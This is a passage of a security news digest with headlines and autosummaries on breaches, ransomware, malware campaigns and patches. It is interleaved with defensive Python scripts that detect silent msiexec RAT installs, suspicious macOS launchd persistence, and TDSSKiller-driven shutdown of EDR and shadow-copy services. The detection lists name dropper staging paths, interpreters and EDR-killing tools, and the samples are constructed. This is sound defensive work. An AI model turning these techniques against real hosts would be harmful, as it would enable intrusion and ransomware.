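QUIET_FLAGS = re.compile(r"(?:^|\s)/(?:quiet|qn|qb|passive)\b", re.IGNORECASE)
# Locations a dropper typically stages an MSI in before calling msiexec.
STAGING_DIRS = re.compile(
    r"\\(?:windows\\temp|temp|programdata|users\\[^\\]+\\appdata|users\\public)\\",
    re.IGNORECASE,
)


@dataclass
class Finding:
    msi_path: str
    parent: str
    score: int
    reasons: list = field(default_factory=list)


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_msiexec_event(event: dict):
    """Score one process-creation event; None if it is not an msiexec package install."""
    if basename(event.get("Image", "")) != "msiexec.exe":
        return None
    cmd = event.get("CommandLine", "")
    m = MSI_ARG.search(cmd)
    if not m:
        return None
    msi = m.group(1) or m.group(2)
    parent = basename(event.get("ParentImage", ""))
    finding = Finding(msi, parent, 0)
    if any(name in basename(msi) for name in RAT_PACKAGE_NAMES):
        finding.score += 3
        finding.reasons.append("package name matches a remote-access tool")
    if parent in SCRIPT_HOSTS:
        finding.score += 2
        finding.reasons.append(f"launched by a scripting host ({parent})")
    if QUIET_FLAGS.search(cmd):
        finding.score += 1
        finding.reasons.append("silent-install switches")
    if STAGING_DIRS.search(msi):
        finding.score += 1
        finding.reasons.append("package staged in a temp/ProgramData/AppData path")
    return finding


def find_suspicious_msiexec(events, threshold: int = 4):
    """Return findings at or above the threshold, in input order."""
    return [f for f in map(score_msiexec_event, events) if f and f.score >= threshold]


# Constructed sample events (Sysmon EID 1 field names); the paths and user are made up.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r"msiexec.exe /i C:\Windows\Temp\AteraAgent.msi /quiet /qn",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"Image": r"C:\Windows\System32\msiexec.exe",  # benign: user double-clicked an installer
     "CommandLine": r'msiexec.exe /i "C:\Users\alice\Downloads\7z2408-x64.msi"',
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Windows\System32\msiexec.exe",  # no RAT name, but scripted + silent + staged
     "CommandLine": r"msiexec.exe /i C:\ProgramData\update.msi /qn",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe"},
]

if __name__ == "__main__":
    for hit in find_suspicious_msiexec(SAMPLE_EVENTS):
        print(hit.score, hit.msi_path, "<-", hit.parent, "|", "; ".join(hit.reasons))
```

The threshold of 4 deliberately lets a scripted, silent install from ProgramData through even when the package name is unknown, since a renamed RAT MSI looks exactly like that; tune the weights against your own software-deployment baseline before alerting on it.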


        Transport for London confirms customer data stolen in cyberattack

        ciber
        2024-09-12 https://www.bleepingcomputer.com/news/security/transport-for-london-confirms-customer-data-stolen-in-cyberattack/
        Transport for London (TfL) has determined that the cyberattack on September 1 impacts customer data, including names, contact details, email addresses, and home addresses. [...] "

        Autosummary: Last Friday, TfL staff was still facing system outages and disruptions, including the inability to respond to customer requests submitted via online forms, issue refunds for journeys paid with contactless methods, and more. "


        Scammers advertise fake AppleCare+ service via GitHub repos

        financial
        2024-09-12 https://www.malwarebytes.com/blog/scams/2024/09/scammers-advertise-fake-applecare-service-via-github-repos
        Beware before calling Apple for assistance as scammers are creating malicious ads and fake pages to lure you in. "

        Autosummary: Google, who reportedly paid Apple $20 billion to be the default search engine, will display results in Safari, along with ads, hence the lucrative partnership. Hey Siri, google “Apple phone support” While Apple products are designed with simplicity in mind, we’ve all come across an issue at some point that we need assistance with. "


        New Android Malware "Ajina.Banker" Steals Financial Data and Bypasses 2FA via Telegram

        financial exploits
        2024-09-12 https://thehackernews.com/2024/09/new-android-malware-ajinabanker-steals.html
        Bank customers in the Central Asia region have been targeted by a new strain of Android malware codenamed Ajina.Banker since at least November 2023 with the goal of harvesting financial information and intercepting two-factor authentication (2FA) messages. Singapore-headquartered Group-IB, which discovered the threat in May 2024, said the malware is propagated via a network of Telegram channels "

        Autosummary: Targets of the ongoing campaign include countries such as Armenia, Azerbaijan, Iceland, Kazakhstan, Kyrgyzstan, Pakistan, Russia, Tajikistan, Ukraine, and Uzbekistan. "


        New Vo1d malware infects 1.3 million Android TV streaming boxes

        exploits
        2024-09-12 https://www.bleepingcomputer.com/news/security/new-vo1d-malware-infects-13-million-android-tv-streaming-boxes/
        [...] "

        Autosummary: In a new report by Dr.Web, researchers found 1.3 million devices infected with the Vo1d malware in over 200 countries, with the largest number detected in Brazil, Morocco, Pakistan, Saudi Arabia, Russia, Argentina, Ecuador, Tunisia, Malaysia, Algeria, and Indonesia. "


        Cybersecurity giant Fortinet discloses a data breach

        financial ciber
        2024-09-12 https://securityaffairs.com/168332/data-breach/fortinet-disclosed-a-data-breach.html
        Fortinet disclosed a data breach after a threat actor claimed the theft of 440GB of files from the company’s Microsoft Sharepoint server. Today, Fortinet told Cyber Daily that a threat actor gained unauthorized access to a third-party service it used. “An individual gained unauthorized access to a limited number of files stored on Fortinet’s instance […] "

        Autosummary: “An individual gained unauthorized access to a limited number of files stored on Fortinet’s instance of a third-party cloud-based shared file drive, which included limited data related to a small number of Fortinet customers, and we have communicated directly with customers as appropriate,” a company spokesman told Cyber Daily. "


        New Vo1d malware infects 1.3 million Android streaming boxes

        exploits
        2024-09-12 https://www.bleepingcomputer.com/news/security/new-vo1d-malware-infects-13-million-android-streaming-boxes/
        Threat actors have infected over 1.3 million TV streaming boxes running Android with a new Vo1d backdoor malware, allowing the attackers to take full control of the devices. [...] "

        Autosummary: In a new report by Dr.Web, researchers found 1.3 million devices infected with the Vo1d malware in over 200 countries, with the largest number detected in Brazil, Morocco, Pakistan, Saudi Arabia, Russia, Argentina, Ecuador, Tunisia, Malaysia, Algeria, and Indonesia. "


        Cybersecurity is a fundamental component of patient care and safety

        ciber
        2024-09-11 https://www.helpnetsecurity.com/2024/09/11/patient-care-cybersecurity/

        Healthcare institutions are custodians of vast repositories of sensitive patient data, encompassing comprehensive health histories, insurance profiles, and billing data. The ramifications of a data breach often extend far beyond the immediate task of patching the vulnerabilities and notifying the affected parties. Often, the less visible costs of these incidents can be equally, if not more, devastating to healthcare providers and the patients they serve. The aftermath of a cyberattack can reverberate for months, impacting … More

        The post Cybersecurity is a fundamental component of patient care and safety appeared first on Help Net Security.

        "

        Autosummary: Cyber threats impact everyone, from doctors and nurses to IT staff, administrators, and patients, which is why protections and policies must be equally as widespread throughout healthcare providers’ workflows. The aftermath of a cyberattack can reverberate for months, impacting an organization from legal, financial, operational, and empathetic standpoints. "


        Cybersecurity jobs available right now: September 11, 2024

        ciber
        2024-09-11 https://www.helpnetsecurity.com/2024/09/11/cybersecurity-jobs-available-right-now-september-11-2024/

        ACISO HTX | Singapore | Hybrid – View job details As an ACISO, you will formulate Agency ICT security strategy and work plan, alignment to MHA and HTX’s IT & Cybersecurity strategic directions. Evaluate existing IT environment against MHA and HTX’s IT & Cybersecurity strategic directions. Ensure security governance, compliance by implementing cyber security risk assessment and risk acceptance at appropriate Agency stakeholders. Review, endorse, develop risk management and mitigation plans. Audit / Risk / … More

        The post Cybersecurity jobs available right now: September 11, 2024 appeared first on Help Net Security.

        "

        Autosummary: Engineer – Artificial Intelligence Presight | UAE | On-site – View job details As an Engineer – Artificial Intelligence, you will design, develop, and optimize computer vision algorithms and models for various surveillance applications, including object detection, tracking, activity recognition, and anomaly detection. Junior Cybersecurity Engineer Quintech Electronics & Communications | USA | On-site – View job details As a Junior Cybersecurity Engineer, you will assist with configuration and management for network devices and security, manage identity and access authorization, process access requests to network resources, including network shares, firewall ACLs, etc. Evaluate and decrease instances of inappropriate or excessive access to promote the principle of least privilege. Principal Associate, Penetration Tester Capital One | USA | Hybrid – View job details As a Principal Associate, Penetration Tester, you will perform penetration testing of APIs, web applications, networks, and cloud services, as well as related applications and infrastructure. Audit / Risk / Compliance Manager Hapag-Lloyd AG | India | On-site – View job details As an Audit / Risk / Compliance Manager, you will design and implement a governance framework specific to IT Infrastructure and Operations to track, manage, and resolve audit findings, risks, and compliance issues. IAM Systems Engineer AIDA Cruises | Germany | Hybrid – View job details As an IAM Systems Engineer, you will be responsible for the development, maintenance and implementation of IAM systems including user lifecycle management, authentication, and access controls, ensuring confidentiality, integrity and availability of IAM systems and data. "


        Saviynt Intelligence delivers identity security analytics through ML and AI capabilities

        industry
        2024-09-11 https://www.helpnetsecurity.com/2024/09/11/saviynt-intelligence-suite/

        Saviynt announced the release of its Intelligence Suite with general availability of Intelligent Recommendations, which will provide customers with dynamic roles, access recommendations, actionable insights, and a multi-dimensional weighted trust scoring model that will be a true game changer. “Saviynt Intelligence will transform identity security from a set of purely operational processes into ones that are automated with artificial intelligence (AI) and machine learning (ML). Our experience is that this actionable intelligence will reduce access … More

        The post Saviynt Intelligence delivers identity security analytics through ML and AI capabilities appeared first on Help Net Security.

        "

        Autosummary: This is Saviynt’s third-generation peer analytics engine, capable of analyzing distinct peer clusters for various identity types, including workforce, contractors, externals, machines, and privileged accounts. "


        Developers Beware: Lazarus Group Uses Fake Coding Tests to Spread Malware

        exploits
        2024-09-11 https://thehackernews.com/2024/09/developers-beware-lazarus-group-uses.html
        Cybersecurity researchers have uncovered a new set of malicious Python packages that target software developers under the guise of coding assessments. "The new samples were tracked to GitHub projects that have been linked to previous, targeted attacks in which developers are lured using fake job interviews," ReversingLabs researcher Karlo Zanki said. The activity has been assessed to be part of "

        Autosummary: "After an initial chat conversation, the attacker sent a ZIP file that contained COVERTCATCH malware disguised as a Python coding challenge, which compromised the user's macOS system by downloading a second-stage malware that persisted via Launch Agents and Launch Daemons," the company said. "
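        The second stage described above persists through launchd, so a quick way to check a developer Mac after one of these "coding tests" is to audit every Launch Agent and Launch Daemon plist for an item that launchd will start on its own and that points at an interpreter, a user-writable or hidden path, or a binary outside the usual system and application locations. The script below is an added, generic example of that audit (not code from ReversingLabs, Mandiant or the article, and it carries no COVERTCATCH-specific indicators); the trusted-prefix list, the interpreter list and the staging-path pattern are the author's assumptions, and the demo plists it writes to a temporary directory are constructed.

```python
import os
import plistlib
import re
import tempfile

# Where launchd programs normally live on a stock Mac (assumption, tune per fleet).
TRUSTED_PREFIXES = ("/System/", "/Library/Apple/", "/Applications/", "/usr/libexec/",
                    "/usr/sbin/", "/usr/bin/", "/bin/", "/sbin/")
# Interpreters a dropper points a Launch Agent at instead of a real binary.
INTERPRETERS = {"python", "python3", "sh", "bash", "zsh", "osascript", "curl", "perl", "ruby"}
# User-writable or hidden locations a persistence payload is commonly staged in.
STAGED_PATH = re.compile(
    r"^(?:/tmp/|/private/tmp/|/var/tmp/|/private/var/tmp/|/Users/Shared/"
    r"|/Users/[^/]+/(?:Library/|\.))|/\.[^/]"
)
# Keys that make launchd start the item without anyone running launchctl.
TRIGGER_KEYS = ("RunAtLoad", "KeepAlive", "StartInterval", "StartCalendarInterval", "WatchPaths")
SYSTEM_DIRS = ["/Library/LaunchAgents", "/Library/LaunchDaemons",
               os.path.expanduser("~/Library/LaunchAgents")]


def audit_plist(plist: dict) -> list:
    """Return the reasons a launchd item looks like dropped persistence (empty if none)."""
    args = list(plist.get("ProgramArguments") or [])
    program = plist.get("Program") or (args[0] if args else None)
    if program is None or not any(plist.get(k) for k in TRIGGER_KEYS):
        return []  # nothing to run, or launchd would not start it on its own
    reasons = []
    base = os.path.basename(program)
    if base in INTERPRETERS:
        reasons.append(f"program is an interpreter ({base})")
    elif not program.startswith(TRUSTED_PREFIXES):
        reasons.append(f"program outside trusted locations: {program}")
    for token in [program] + args[1:]:
        if STAGED_PATH.search(token):
            reasons.append(f"references a staged/hidden path: {token}")
            break
    return reasons


def audit_dirs(dirs) -> list:
    """Parse every .plist in the given directories and report the suspicious ones."""
    findings = []
    for d in dirs:
        if not os.path.isdir(d):
            continue
        for name in sorted(os.listdir(d)):
            if not name.endswith(".plist"):
                continue
            path = os.path.join(d, name)
            try:
                with open(path, "rb") as fp:
                    plist = plistlib.load(fp)
            except Exception as exc:  # a plist launchd cannot load is itself worth a look
                findings.append({"path": path, "label": None, "reasons": [f"unparseable plist: {exc}"]})
                continue
            reasons = audit_plist(plist)
            if reasons:
                findings.append({"path": path, "label": plist.get("Label"), "reasons": reasons})
    return findings


# Constructed demo items; labels and paths are made up for the example.
DEMO_ITEMS = {
    "com.example.updater": {"ProgramArguments": ["/usr/bin/python3", "/Users/dev/Library/.cache/update.py"],
                            "RunAtLoad": True},
    "com.example.helper": {"ProgramArguments": ["/Applications/ExampleApp.app/Contents/MacOS/ExampleApp", "--background"],
                           "RunAtLoad": True},
    "local.agent": {"Program": "/tmp/.x/agent", "KeepAlive": True},
    "com.example.ondemand": {"ProgramArguments": ["/bin/sh", "-c", "echo hello"]},  # no trigger key
}


def build_demo() -> list:
    """Write the demo plists to a temp directory and audit it."""
    tmp = tempfile.mkdtemp(prefix="launchd-audit-")
    for label, body in DEMO_ITEMS.items():
        with open(os.path.join(tmp, label + ".plist"), "wb") as fp:
            plistlib.dump({"Label": label, **body}, fp)
    return audit_dirs([tmp])


if __name__ == "__main__":
    for f in build_demo():  # on a real Mac, use audit_dirs(SYSTEM_DIRS) instead
        print(f["label"], f["path"], "|", "; ".join(f["reasons"]))
```

Expect noise from legitimate per-user helpers that live under ~/Library; the point is to shortlist what to open, and an item that pairs an interpreter with a hidden directory is the one to read first.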


        Microsoft Issues Patches for 79 Flaws, Including 3 Actively Exploited Windows Flaws

        exploits
        2024-09-11 https://thehackernews.com/2024/09/microsoft-issues-patches-for-79-flaws.html
        Microsoft on Tuesday disclosed that three new security flaws impacting the Windows platform have come under active exploitation as part of its Patch Tuesday update for September 2024. The monthly security release addresses a total of 79 vulnerabilities, of which seven are rated Critical, 71 are rated Important, and one is rated Moderate in severity. This is aside from 26 flaws that the tech "

        Autosummary: CVE-2024-38217 - Windows Mark-of-the-Web (MotW) Security Feature Bypass Vulnerability; CVE-2024-38226 (CVSS score: 7.3) - Microsoft Publisher Security Feature Bypass Vulnerability; CVE-2024-43491 (CVSS score: 9.8) - Microsoft Windows Update Remote Code Execution Vulnerability. "Exploitation of both CVE-2024-38226 and CVE-2024-38217 can lead to the bypass of important security features that block Microsoft Office macros from running," Satnam Narang, senior staff research engineer at Tenable, said in a statement. "


        Microsoft Patch Tuesday security updates for September 2024 addressed four actively exploited zero-days

        exploits
        2024-09-11 https://securityaffairs.com/168279/security/microsoft-patch-tuesday-sept-2024.html
        Microsoft Patch Tuesday security updates for September 2024 addressed 79 flaws, including four actively exploited zero-day flaws. Microsoft Patch Tuesday security updates for September 2024 addressed 79 vulnerabilities in Windows and Windows Components; Office and Office Components; Azure; Dynamics Business Central; SQL Server; Windows Hyper-V; Mark of the Web (MOTW); and the Remote Desktop Licensing […] "

        Autosummary: Microsoft Patch Tuesday security updates for September 2024 addressed four actively exploited zero-days. Pierluigi Paganini, September 11, 2024. Microsoft Patch Tuesday security updates for September 2024 addressed 79 flaws, including four actively exploited zero-day flaws. "


        Protests in Mexico as controversial judicial reform passed

        latam
        2024-09-11 https://www.bbc.com/news/articles/cy4y9q74j2ko
        Proponents say it will make judges more accountable but critics fear it undermines their independence. "

        Autosummary: "


        Highline Public Schools school district suspended its activities following a cyberattack

        ciber
        2024-09-11 https://securityaffairs.com/168305/cyber-crime/highline-public-schools-school-district-cyberattack.html
        Highline Public Schools, a school district in Washington state, remains closed following a cyberattack that occurred two days ago. Two days ago Highline Public Schools (HPS), a school district in Washington state, suffered a cyber attack that caused a significant disruption of its activities. Highline Public Schools (HPS) is a public school district in King County, headquartered in Burien, Washington, […] "

        Autosummary: Highline Public Schools school district suspended its activities following a cyberattack. Pierluigi Paganini, September 11, 2024. Highline Public Schools, a school district in Washington state, remains closed following a cyberattack that occurred two days ago. "


        RansomHub ransomware gang relies on Kaspersky TDSSKiller tool to disable EDR

        exploits ransomware
        2024-09-11 https://securityaffairs.com/168296/malware/ransomhub-ransomware-tdskiller-disable-edr.html
        Researchers observed the RansomHub ransomware group using the TDSSKiller tool to disable endpoint detection and response (EDR) systems. The RansomHub ransomware gang is using the TDSSKiller tool to disable endpoint detection and response (EDR) systems, Malwarebytes ThreatDown Managed Detection and Response (MDR) team observed. TDSSKiller is a legitimate tool developed by the cybersecurity firm Kaspersky to […] "

        Autosummary: RansomHub ransomware gang relies on Kaspersky TDSSKiller tool to disable EDR. Pierluigi Paganini, September 11, 2024. Researchers observed the RansomHub ransomware group using the TDSSKiller tool to disable endpoint detection and response (EDR) systems. "


        Brazil and Argentina lose in World Cup qualifying

        latam
        2024-09-11 https://www.bbc.com/sport/football/articles/cq5dvq5171vo
        Brazil and Argentina are both defeated in their latest qualifying matches for the 2026 Fifa World Cup. "

        Autosummary: "


        Adobe fixes Acrobat Reader zero-day with public PoC exploit

        exploits
        2024-09-11 https://www.bleepingcomputer.com/news/security/adobe-fixes-acrobat-reader-zero-day-with-public-poc-exploit/
        A cybersecurity researcher is urging users to upgrade Adobe Acrobat Reader after a fix was released yesterday for a remote code execution zero-day with a public in-the-wild proof-of-concept exploit. [...] "

        Autosummary: PoC exploit discovered in June The Acrobat Reader zero-day was discovered in June through EXPMON, a sandbox-based platform created by cybersecurity researcher Haifei Li to detect advanced exploits such as zero-days or hard-to-detect (unknown) exploits. "


        Kali Linux 2024.3 released: 11 new tools, Qualcomm Snapdragon SDM845 SoC support

        Linux
        2024-09-11 https://www.helpnetsecurity.com/2024/09/11/kali-linux-2024-3-released/

        Kali Linux 2024.3 is now available for download. Besides the new tools, this release mainly focuses on behind-the-scenes updates and optimization. New tools in Kali Linux 2024.3 This Kali release is about new tools and package updates: goshs – Think SimpleHTTPServer, but written in Go, and with more features graudit – Grep Rough AUDIT: source code auditing tool gsocket – Allows two machines on different networks to communicate with each other hekatomb – Extract and … More

        The post Kali Linux 2024.3 released: 11 new tools, Qualcomm Snapdragon SDM845 SoC support appeared first on Help Net Security.

        "

        Autosummary: "


        Data centres as vital as NHS and power grid, government says

        government
        2024-09-11 https://www.bbc.com/news/articles/c23ljy4z05mo
        Critical national infrastructure status means they will get extra government support during emergencies. "

        Autosummary: Data centres in the UK are to be classified as critical national infrastructure, joining the emergency services, finance and healthcare systems, and energy and water supplies. "


        6 common Geek Squad scams and how to defend against them

        financial
        2024-09-11 https://www.welivesecurity.com/en/scams/6-common-geek-squad-scams-how-defend/
        Learn about the main tactics used by scammers impersonating Best Buy’s tech support arm and how to avoid falling for their tricks "

        Autosummary: Here are the most common we’ve observed: Auto-renewal: You receive an email reminding you that a non-existent subscription to a Best Buy or Geek Squad service is coming to an end and will auto-renew unless you click a link. Invoice fraud: Similarly to the above, you receive an email containing a fake invoice for non-existent services rendered. In this variation, they’re from Geek Squad, and will trick you into giving them remote access to your computer, which they will use to download actual malware to search for sensitive personal and financial information. If you think you’ve been scammed, in the worst-case scenario you may need to freeze your credit/debit cards, contact your bank/card provider and apply for new ones. "


        Tech stack uniformity has become a systemic vulnerability

        exploits
        2024-09-10 https://www.helpnetsecurity.com/2024/09/10/tech-stack-diversity/

        Crashes due to faulty updates are nothing new; in fact, one reason IT teams often delay updates is their unreliability and tendency to disrupt the organization’s day-to-day operations. Zero-days are also an old phenomenon. In the past, due to a lack of cybersecurity awareness among even the largest vendors and their users, zero-days were not only more common but also often publicly available, enabling script kiddies to exploit them. Another thing that was usual in … More

        The post Tech stack uniformity has become a systemic vulnerability appeared first on Help Net Security.

        "

        Autosummary: Today, we see a much smaller number of operating systems in widespread use, and even “different” Linux distributions often share common codebases, which means that, for example, a bug or vulnerability affecting Ubuntu would probably also affect Linux Mint. Furthermore, organizations can adopt hybrid systems, where redundancy is achieved between the company’s own network and the cloud, or benefit from multi-cloud systems, where different cloud providers are utilized simultaneously. Tech stack diversity used to limit the impact of a single faulty update or exploit, but we are now experiencing an era of dwindling vendor and product diversity in critical systems (though, in certain industries, this has been a long-standing issue). "


        33 open-source cybersecurity solutions you didn’t know you needed

        ciber
        2024-09-10 https://www.helpnetsecurity.com/2024/09/10/open-source-cybersec-tools/

        Open-source cybersecurity tools provide transparency and flexibility, allowing users to examine and customize the source code to fit specific security needs. These tools make cybersecurity accessible to a broader range of organizations and individuals. In this article, you will find a list of 33 open-source cybersecurity tools for Linux, Windows, and macOS that you should consider to enhance protection and stay ahead of potential threats. Authentik: Open-source identity provider Authentik is an open-source identity provider … More

        The post 33 open-source cybersecurity solutions you didn’t know you needed appeared first on Help Net Security.

        "

        Autosummary: SELKS: Open-source Suricata IDS/IPS, network security monitoring, threat hunting SELKS is a free, open-source, turnkey solution for Suricata-based network intrusion detection and protection (IDS/IPS), network security monitoring (NSM), and threat hunting. Cilium: Open-source eBPF-based networking, security, observability Cilium is an open-source, cloud-native solution that leverages eBPF technology in the Linux kernel to provide, secure, and monitor network connectivity between workloads. Sinon: Open-source automatic generative burn-in for Windows deception hosts Sinon is an open-source, modular tool for the automatic burn-in of Windows-based deception hosts. Ghidra: Open-source software reverse engineering framework Ghidra, a cutting-edge open-source software reverse engineering (SRE) framework, is a product of the National Security Agency (NSA) Research Directorate. "


        Electronic payment gateway Slim CD disclosed a data breach impacting 1.7M individuals

        financial
        2024-09-10 https://securityaffairs.com/168229/data-breach/slim-cd-disclosed-a-data-breach.html
        Payment gateway provider Slim CD disclosed a data breach; credit card and personal data of almost 1.7 million individuals were compromised. The electronic payment gateway Slim CD disclosed a data breach following a cyberattack. Personal data and credit card details of 1,693,000 individuals were compromised. Slim CD’s gateway system allows merchants to accept any kind […] "

        Autosummary: “Slim CD is providing individuals with information on how to place a fraud alert and security freeze on one’s credit file, the contact details for the national consumer reporting agencies, information on how to obtain a free credit report, a reminder to remain vigilant for incidents of fraud and identity theft by reviewing account statements and monitoring free credit reports, and encouragement to contact the Federal Trade Commission, their state Attorney General, and law enforcement to report attempted or actual identity theft and fraud.” "


        NoName ransomware gang deploying RansomHub malware in recent attacks

        exploits ransomware
        2024-09-10 https://www.bleepingcomputer.com/news/security/noname-ransomware-gang-deploying-ransomhub-malware-in-recent-attacks/
        The NoName ransomware gang has been trying to build a reputation for more than three years targeting small and medium-sized businesses worldwide with its encryptors and may now be working as a RansomHub affiliate. [...] "

        Autosummary: NoName has been using brute force to gain access to networks, but the threat actor also exploits several vulnerabilities that are more likely to be present in SMB environments (per ESET): CVE-2017-0144 (aka EternalBlue); CVE-2023-27532 (a vulnerability in a Veeam Backup & Replication component); CVE-2021-42278 and CVE-2021-42287 (AD privilege escalation vulnerabilities) through noPac; CVE-2022-42475 (a vulnerability in FortiOS SSL-VPN); CVE-2020-1472 (aka Zerologon). Before launching the encryptor, ScRansom kills a list of processes and services on the Windows host, including Windows Defender, the Volume Shadow Copy, SVCHost, RDPclip, LSASS, and processes associated with VMware tools. "
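        Two items on this page describe the same pre-encryption step from different angles: RansomHub running Kaspersky's TDSSKiller to disable EDR, and NoName's ScRansom stopping Windows Defender and the Volume Shadow Copy service before it encrypts. The example below is added here (it is not code from Malwarebytes, ESET or either article) and correlates the two signals: a known AV/EDR-disabling utility launching on a host, followed within a short window by a protected security or backup service stopping on the same host. The log line format is a constructed, normalized one rather than a vendor schema, the service names are the real Windows service names for Defender (WinDefend), Defender for Endpoint (Sense), Malwarebytes (MBAMService) and Volume Shadow Copy (VSS), and the sample lines, hosts and paths are made up for the demo.

```python
import re
from dataclasses import dataclass
from datetime import datetime, timedelta

# Dual-use utilities seen disabling security tooling; TDSSKiller is the one named on this page.
KILLER_TOOLS = {"tdsskiller.exe"}
# Services whose stop event is worth an alert on its own (Windows service names).
PROTECTED_SERVICES = {
    "windefend": "Windows Defender Antivirus",
    "sense": "Microsoft Defender for Endpoint",
    "mbamservice": "Malwarebytes",
    "vss": "Volume Shadow Copy",
}
HEADER = re.compile(r"^(?P<ts>\S+) host=(?P<host>\S+) evt=(?P<evt>\S+)\s*(?P<rest>.*)$")
KV = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')


@dataclass
class Alert:
    ts: datetime
    host: str
    severity: str
    detail: str


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def parse_line(line: str):
    """Turn one normalized telemetry line into a dict, or None if it does not parse."""
    m = HEADER.match(line)
    if not m:
        return None
    event = {"ts": datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ"), "host": m["host"], "evt": m["evt"]}
    for key, quoted, bare in KV.findall(m["rest"]):
        event[key] = quoted if quoted else bare
    return event


def detect_tampering(lines, window: timedelta = timedelta(minutes=15)) -> list:
    """Alert on killer-tool launches and protected-service stops; escalate a stop that
    follows a killer-tool launch on the same host within the window."""
    events = [e for e in (parse_line(l) for l in lines) if e]
    events.sort(key=lambda e: e["ts"])
    last_tool = {}  # host -> timestamp of the most recent killer-tool launch
    alerts = []
    for e in events:
        if e["evt"] == "ProcessCreate":
            name = basename(e.get("image", ""))
            if name in KILLER_TOOLS:
                last_tool[e["host"]] = e["ts"]
                alerts.append(Alert(e["ts"], e["host"], "medium",
                                    f"AV/EDR-disabling utility launched: {name} "
                                    f"(parent {basename(e.get('parent', ''))})"))
        elif e["evt"] == "ServiceStop":
            svc = e.get("service", "").lower()
            if svc in PROTECTED_SERVICES:
                seen = last_tool.get(e["host"])
                recent = seen is not None and timedelta(0) <= e["ts"] - seen <= window
                detail = f"protected service stopped: {PROTECTED_SERVICES[svc]} ({e['service']})"
                if recent:
                    detail += " shortly after a killer utility ran on this host"
                alerts.append(Alert(e["ts"], e["host"], "high" if recent else "medium", detail))
    return alerts


# Constructed sample telemetry (not real logs). WS01 shows the tamper sequence;
# WS02 shows a lone Defender stop with no preceding tool launch.
SAMPLE_LINES = r"""
2024-09-10T03:12:44Z host=WS01 evt=ProcessCreate image="C:\Users\Public\tdsskiller.exe" parent="C:\Windows\System32\cmd.exe"
2024-09-10T03:12:51Z host=WS01 evt=ServiceStop service=MBAMService
2024-09-10T03:13:02Z host=WS01 evt=ServiceStop service=WinDefend
2024-09-10T03:13:05Z host=WS01 evt=ServiceStop service=VSS
2024-09-10T03:20:00Z host=WS01 evt=ServiceStop service=Spooler
2024-09-10T08:00:00Z host=WS02 evt=ServiceStop service=WinDefend
2024-09-10T08:00:10Z host=WS02 evt=ProcessCreate image="C:\Windows\System32\notepad.exe" parent="C:\Windows\explorer.exe"
""".strip().splitlines()

if __name__ == "__main__":
    for a in detect_tampering(SAMPLE_LINES):
        print(a.ts.isoformat(), a.host, a.severity.upper(), a.detail)
```

Stopping VSS is what makes shadow-copy recovery impossible, so it earns the same weight as stopping the AV service; a lone Defender stop stays at medium because patching and maintenance scripts also do that, and the tool launch is what turns it into a ransomware precursor.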


        Mustang Panda Deploys Advanced Malware to Spy on Asia-Pacific Governments

        exploits government
        2024-09-10 https://thehackernews.com/2024/09/mustang-panda-deploys-advanced-malware.html
        The threat actor tracked as Mustang Panda has refined its malware arsenal to include new tools in order to facilitate data exfiltration and the deployment of next-stage payloads, according to new findings from Trend Micro. The cybersecurity firm, which is monitoring the activity cluster under the name Earth Preta, said it observed "the propagation of PUBLOAD via a variant of the worm HIUPAN." "

        Autosummary: PUBLOAD is equipped with features to conduct reconnaissance of the infected network and harvest files of interest (.doc, .docx, .xls, .xlsx, .pdf, .ppt, and .pptx), while also serving as a conduit for a new hacking tool dubbed FDMTP, which is a "simple malware downloader" implemented based on TouchSocket over Duplex Message Transport Protocol (DMTP). "


        U.S. CISA adds SonicWall SonicOS, ImageMagick and Linux Kernel bugs to its Known Exploited Vulnerabilities catalog

        exploits Linux
        2024-09-10 https://securityaffairs.com/168251/security/u-s-cisa-adds-sonicwall-sonicos-imagemagick-and-linux-kernel-bugs-to-its-known-exploited-vulnerabilities-catalog.html
        U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds SonicWall SonicOS, ImageMagick and Linux Kernel bugs to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added SonicWall SonicOS, ImageMagick and Linux Kernel vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog. Below are the descriptions for these vulnerabilities: CVE-2016-3714 flaw (aka ImageTragick), in the popular […] "

        Autosummary: Below are the descriptions for these vulnerabilities: CVE-2016-3714 ImageMagick Improper Input Validation Vulnerability CVE-2017-1000253 Linux Kernel PIE Stack Buffer Corruption Vulnerability CVE-2024-40766 SonicWall SonicOS Improper Access Control Vulnerability CVE-2016-3714 flaw (aka ImageTragick), in the popular image manipulation software ImageMagick could allow remote attackers to execute arbitrary code via shell metacharacters in a crafted image, aka “ImageTragick.” "


        Firefighter "who wanted to be hero" arrested over deadly Chile blaze

        latam
        2024-09-10 https://www.bbc.com/news/articles/crmwg28k9vwo
        The fire was Chile's deadliest, killing a total of 137 people and leaving many more homeless. "

        Autosummary: Firefighter "who wanted to be hero" arrested over deadly Chile blaze Police said the suspect had set the blaze because "he likes to be a hero, participating and helping in emergencies". "


        Payment provider data breach exposes credit card information of 1.7 million customers

        financial
        2024-09-10 https://www.malwarebytes.com/blog/news/2024/09/payment-provider-data-breach-exposes-credit-card-information-of-1-7-million-customers
        Payment gateway provider Slim CD has notified 1.7 million users that their credit card information may have been leaked. "

        Autosummary: The company said it is not aware of anyone yet using the exposed information: “Although Slim CD presently has no evidence that any such information has been used to commit identity theft or fraud, Slim CD is providing information about the event, Slim CD’s response, and resources available to individuals to help protect their information from possible misuse.” Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts. A subsequent investigation by a third-party specialist revealed that cybercriminals had access to Slim CD’s systems for 10 months, between August 17, 2023, and June 15, 2024. "


        Your partner “is cheating on you” scam asks you to pay to see proof

        financial
        2024-09-10 https://www.malwarebytes.com/blog/news/2024/09/your-partner-is-cheating-on-you-scam-asks-you-to-pay-to-see-proof
